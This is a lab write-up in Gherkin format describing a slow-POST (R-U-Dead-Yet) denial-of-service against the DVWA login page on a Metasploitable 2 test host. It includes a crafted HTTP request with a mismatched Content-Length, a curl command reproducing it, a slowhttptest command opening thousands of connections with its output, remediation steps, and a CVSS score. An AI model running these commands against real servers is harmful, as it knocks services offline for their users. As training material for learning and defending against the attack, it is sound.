## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 2
  Category:
    DoS R-U-Dead-Yet
  Location:
    http://localhost/dvwa/login.php
  CWE:
    CWE-400: Uncontrolled Resource Consumption
      https://cwe.mitre.org/data/definitions/400.html
    CWE-674: Uncontrolled Recursion
      https://cwe.mitre.org/data/definitions/674.html
    CWE-130: Improper Handling of Length Parameter Inconsistency
      https://cwe.mitre.org/data/definitions/130.html
  Rule:
    https://fluidattacks.com/web/rules/181/
  Goal:
    Execute a post body DoS R-U-Dead-Yet
  Recommendation:
    The connections of a client must be limited on the configuration files

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali GNU        | 2019.2      |
    | chrome          | 74.0.3729.1 |
    | Metasploit      | 4.14.13     |
  TOE information:
    Given I am accessing the site http://localhost/dvwa/login.php
    And enter a site that allows me to go to different services with vulns
    And Apache version 2.2.8
    And is running on Metasploitable 2 with kernel 2.6.24

  Scenario: Normal use case
    Given I access http://localhost
    Then I see a webpage with links to other pages with services
    When I enter on the hypertext dvwa
    Then I get to see a login page with username and password fields
    And I see the button of login to enter on dvwa resources

  Scenario: Static detection
    Given I seek on internet types of denial of service
    When I found is posible to make a DoS by changing the content-type length
    And I send less amount of data on the body than is set on the header
    Then I tried to probe the vulnerability intercepting on Burpsuite
    And Sending the request to the repeter to see its response behavior
    """
    Request:
    POST /dvwa/login.php HTTP/1.1
    Host: 192.168.0.4
    Content-Length: 39
    Content-Type: application/x-www-form-urlencoded
    Connection: close

    username=saca&password=saca&Login=Login

    Response:
    HTTP/1.1 302 Found
    Date: Sun, 21 Jul 2019 01:48:15 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2
    ...
    """
    When I changed the Content-Length to a "141" value and erase the body
    Then I resend the request on burpsuite with the new value
    And I saw a waiting  message for a few minutes
    And once it was completed a timeout alert.

  Scenario: Dynamic detection
    Given I can change the content length of request and the body data
    When I run the following command to create a request connection on curl
    """
    curl -L -c post_login_cookie 'http://192.168.0.10/dvwa/login.php' -H \
    'Content-Length: 141' --data 'username=enwoo&password=enwoo&Login=Login'
    """
    Then I saw that curl command stayed still unresposive
    And I tested if the server accept other connections from the same client
    When I opened manually ten bad request by curl commands
    Then I realized all the requests were accepted
    And it seems the server kept waiting for the rest of the content on each

  Scenario: Exploitation
    Given I can send a big amount of requests using slowhttptest
    When I execute the following commands on a terminal:
    """
    slowhttptest -c 10000 -B -i 10 -r 100 -s 8192 -t username -u \
    http://192.168.0.4/dvwa/login.php -x 10 -p 300
    """
    And I open "300" connections per second sending a bad request:
    """
    ...
    test type:                        SLOW BODY
    number of connections:            10000
    URL:                              http://192.168.0.4/dvwa/login.php
    verb:                             username
    Content-Length header value:      8192
    follow up data max size:          22
    interval between follow up data:  10 seconds
    connections per seconds:          100
    probe connection timeout:         300 seconds
    test duration:                    240 seconds
    using proxy:                      no proxy

    Sat Jul 20 21:26:59 2019:
    slow HTTP test status on 220th second:

    initializing:        0
    pending:             4301
    connected:           378
    error:               0
    closed:              5321
    service available:   YES
    ...
    """
    Then I reharged the page 'http://localhost/dvwa/login.php' on the browser
    And the page keep reloading until appeared "this site can't be reached"
    When the attack command ended it showed the following message:
    """
    ...
    Test ended on 241th second
    Exit status: Hit test time limit
    """
    And I reharged 'http://localhost/dvwa/login.php' on the browser
    Then I could access the login page without problem

  Scenario: Remediation
    When the configuration of the resources and server are been stablished
    Then Set the maximum lenght for the content type header and body request
    And Drop those requests that keep the sever busy for a long time
    And Limit the number of connections a client can make on a lapse

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.9/10 (Medium) - CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:N/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2019-07-12
